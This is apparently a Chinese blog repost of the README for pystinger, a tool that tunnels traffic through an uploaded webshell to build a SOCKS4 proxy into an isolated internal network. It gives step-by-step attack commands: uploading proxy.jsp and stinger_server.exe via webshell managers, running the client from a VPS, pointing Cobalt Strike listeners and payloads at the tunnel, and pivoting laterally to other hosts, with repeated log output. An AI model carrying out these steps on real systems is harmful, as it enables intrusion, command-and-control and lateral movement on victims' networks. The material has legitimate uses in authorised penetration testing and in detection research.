渗透工具pystinger:一款使用 webshell 进行流量转发的出网工具

原创 已于 2022-05-09 11:52:50 修改 · 2.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#系统安全 #测试工具 #安全 #python

于 2022-05-09 11:52:40 首次发布
pystinger是一个利用webshell创建内网SOCK4代理的工具,支持php、jsp和aspx脚本。它可以与metasploit-framework、viper和cobaltstrike配合使用,实现单主机或多主机上线。使用方法包括上传代理脚本到目标服务器,启动服务端,然后通过stinger_client设置本地监听和远程服务器连接。
部署运行你感兴趣的模型镜像

Git地址:pystinger/readme_cn.md at master ·滑稽狼/幽灵 (github.com)

pystinger

 

毒刺(pystinger)通过webshell实现内网SOCK4代理端口映射.

可直接用于metasploit-framework,viper,cobalt strike上线.

主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.

使用方法

假设不出网服务器域名为 http://example.com:8080 ,服务器内网IP地址为192.168.3.11

袜子4代理

  • proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回UTF-8
  • 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行启动服务端start D:/XXX/stinger_server.exe

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连

  • vps执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  • 如下输出表示成功
<span style="color:#cac5bd"><span style="background-color:#111417"><span style="background-color:rgba(219, 221, 222, 0.1) !important"><code>root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
</code></span></span></span>
  • 此时已经在vps启动了一个所在内网的socks4a代理127.0.0.1:60000example.com
  • 此时已经将目标服务器的映射到vps的127.0.0.1:60020127.0.0.1:60020

单主机上线

  • proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回UTF-8
  • 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行启动服务端start D:/XXX/stinger_server.exe

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连

  • stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  • 如下输出表示成功
<span style="color:#cac5bd"><span style="background-color:#111417"><span style="background-color:rgba(219, 221, 222, 0.1) !important"><code>root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
</code></span></span></span>
  • cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
  • 生成payload,上传到主机运行后即可上线

多主机上线

  • proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回UTF-8
  • 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行启动服务端start D:/XXX/stinger_server.exe 192.168.3.11

192.168.3.11可以改成0.0.0.0

  • stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  • 如下输出表示成功
<span style="color:#cac5bd"><span style="background-color:#111417"><span style="background-color:rgba(219, 221, 222, 0.1) !important"><code>root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
</code></span></span></span>
  • cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为192.168.3.11(example.com的内网IP地址)
  • 生成payload,上传到主机运行后即可上线
  • 横向移动到其他主机时可以将payload指向192.168.3.11:60020即可实现出网上线

定制Header及proxy

  • 如果webshell需要配置Cookie或者Authorization,可通过--header参数配置请求头

--header "Authorization: XXXXXX,Cookie: XXXXX"

  • 如果webshell需要通过代理访问,可通过--proxy设置代理

--proxy "socks5:127.0.0.1:1081"

相关工具

GitHub - nccgroup/ABPTTS: TCP tunneling over HTTP/HTTPS for web application servers

GitHub - sensepost/reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

GitHub - SECFORCE/Tunna: Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

您可能感兴趣的与本文相关的镜像

Python3.11

Python3.11

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

Pystinger使用
谢公子的博客
08-30 2780
目录 Pystinger 实现多主机上线cs 目标主机执行 VPS执行 CS开启监听 生成木马 内横向移动 Pystinger 一款利用webshell实现内socks4代理、端口映射的工具,可直接用于MSF/CS等上线。使用python编写, 当前支持php,jsp(x),aspx三种代理脚本 。 项目地址: https://github.com/FunnyWolf/pystinger 原地介绍: https://mp.weixin.qq.com/s/45AKbRS677fxyn
使用Pystinger进行编程
PixelInk的博客
09-13 89
我们讨论了Pystinger的安装过程,以及加载音频文件、可视化音频波形、提取音频特征和进行音频处理的示例代码。希望这些示例能帮助您开始使用Pystinger,并在声音信号处理的任务中取得进展。它提供了丰富的功能,可以帮助开发人员在音频处理和分析的任务中取得进展。本文将介绍Pystinger使用,并提供一些示例代码来说明其功能和用法。要开始使用Pystinger,首先需要将其安装到您的Python环境中。Pystinger提供了一些函数来提取音频的各种特征,如时域特征、频域特征等。
Pystinger上线不机器
crowsec
10-20 559
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01 使用场景 毒刺(Pystinger)通过webshell搭建内socks4代理,可用于上线CobaltStrike,此方法适用于目标主机不但存在web应用可被互联访问的情况。 02拓扑结构 03使用方法 下载地址: https://github.com/FunnyWolf/pystinger 拿下第一层络后,上传webshell到机器上。 访问 http://靶...
工具使用Pystinger(毒刺)的使用
李同學的安全圈
03-09 1792
文章目录Pystinger介绍项目地址Pystinger 原理图实现主机上线CS服务端配置客户端配置 Pystinger介绍 一款用于Webshell实现内 socks4 代理、端口映射的工具,可直接用于CobaltStrike / Metasploit上线,该工具使用python语言编写,目前支持的语言有 php, jsp(x) 和 aspx 三种脚本语言。 项目地址 https://github.com/FunnyWolf/pystinger https://gitee.com/zhanghk66
金刚狼:ShellCode执行、C#代码执行、Suo5代理
最新发布
OneCrab的博客
09-30 1022
金刚狼是一款专为 ASPX 环境设计的高级 WebShell 管理工具,为安全研究人员和渗透测试人员提供强大的命令执行、权限提升和内穿透能力。
一款使用webshell进行流量转发工具(pystinger)
lza20001103的博客
08-26 527
一款使用webshell进行流量转发工具(pystinger) 下载地址:https://github.com/FunnyWolf/pystinger
HTTP隐蔽隧道工具--pystinger流量特征检测分析
qq_36259703的博客
10-20 426
毒刺(pystinger)通过webshell实现可直接用于metasploit-framework,viper,cobalt strike上线.主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具
weixin_46280935的博客
09-10 6545
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
突破内常见技巧的优缺点总结及推荐方案
weixin_42489549的博客
02-11 758
在渗透测试中,目标内主机无法直接访问外部络(即“不”)是常见且棘手的问题。本文总结了20种内穿透技巧的优缺点,并附上具体操作命令及注释。
pystinger (毒刺)正向代理工具
weixin_66717977的博客
03-21 2773
pystinger毒刺是一款正向代理工具,通过webshell可以实现内 socks4代理和端口映射,并且也可以直接上线MSF和CS。
Pystinger实现内主机CS上线
痴人说梦梦中人
03-29 4940
Pystinger实现内主机CS上线一、Pystinger简介二、原理分析三、操作演示 一、Pystinger简介         毒刺(pystinger)通过webshell实现内SOCK4代理,端口映射。可直接用于metasploit-framework,viper,cobalt strike上线,主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。 repo:https://github.c
渗透中目标不的情况下使用pystinger进行上线Cobalt Strike
qq_43776040的博客
02-17 3499
渗透中目标不的情况下使用pystinger进行上线cobaltstrike简介上传服务端与代理文件 简介 By:猪儿虫 Github:https://github.com/black537 在内渗透中我们常常遇到内的情况。今天推荐一款工具pystinger。这款工具是一个使用webshell进行流量转发工具。它使用的是sock4代理,端口映射。可直接进行上线metasploit-framework、viper、cobalt strike。目前只支持PHP、jsp(x)、aspx三种
探索 PyStinger:高效日志处理的利器
gitblog_00097的博客
04-25 392
是一个由 FunnyWolf 开发的 Python 库,专注于高速地处理和分析大规模的日志数据。这个项目的设计理念是为数据分析师、运维人员和开发者提供一个轻量级但功能强大的工具,以应对大数据时代下的日志管理挑战。 ## 技术分析 PyStinger 的核心技术在于它的**Trie 树**实现。Trie,也被称为“前缀树”,是一种用于存储字符串的有效数据结构。通过这种方式,PyStinger 可...
渗透-(端口复用和隧道建立)
qq_50643984的博客
03-15 4259
前言: 首先对于与不的区别很多人不理解,内到底是ping不通百度还是ping不通同一段的机器。 其实大部分内都是ping不通百度,不能去外,ping不通同一段要不是配置错误,要不就是防火墙问题,还有就是不能ping通同一段的机器上线价值不大,以下我们讨论的不都是不能ping通百度的。 对于有双卡的机器,既可以又和内机器相同我们称这个机器为(DMZ区机器),也就是win7机器,一般也是我们的跳板机。 对于这种我们可以直接拿下dmz区域的机器,利用dmz机器跳板进
python 服务器与主机简单通信
m18096602934的博客
12-16 523
这里写自定义目录标题主机客户端通信socket使用介绍发送端接收端 主机客户端通信socket 这是项目临时要求用笔记本展示结果,用python写了一个文件传输子程序,在这里保存一下,备用。 使用介绍 在使用这套程序之前需要准备以下工具: 多台电脑,一台发送端,n台接收端,可以运行python3的; 路由器一个(交换机不知道行不行,主要目的是把电脑加到局域里); 无线卡或者线,连接路由器或...
冰蝎的安装和使用
weixin_51641247的博客
04-06 7606
相对于菜刀和蚁剑,冰蝎的特点是动态二进制加密实现新型一句话木马,它的数据是加密传输的,右键空白处新增,输入webshell信息,若使用冰蝎自带的webshell则默认密码为rebeyond冰蝎提供asp、c#、php、Java的自定义代码执行功能,文本框支持语法高亮,c#和Java会把输入的源代码自动编译并执行。
ajax请求跨域设置代理_ASP.NET代理页面–用于来自AJAX和JavaScript的跨域请求
cunchi8090的博客
07-17 303
ajax请求跨域设置代理 One of the pain points with developing AJAX, JavaScript, JQuery, and other client-side behaviors is that JavaScript doesn’t allow for cross domain request for pulling ...
webshell使用流量分析(含数据包)
hackzkaq的博客
04-29 4679
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员-逍遥子 一、菜刀 1.使用方法 菜刀的使用简单,将一句话木马上传到目标,然后直接使用菜刀连接即可,菜刀主要可以对目标进行虚拟终端,文件操作,数据库操作等。 2.流量分析 1.当菜刀和服务器连接后:最开的的两次流量通信,便产生了大量的数据信息。且使用了base64的方式进行编码 2.对数据解码,发现第一的数据是获取设备的信息,第二段数据是写入了一段新的木马,对第二段的base64编码进行转码整理后得到; @ini_set("displa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

风过留不留声

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值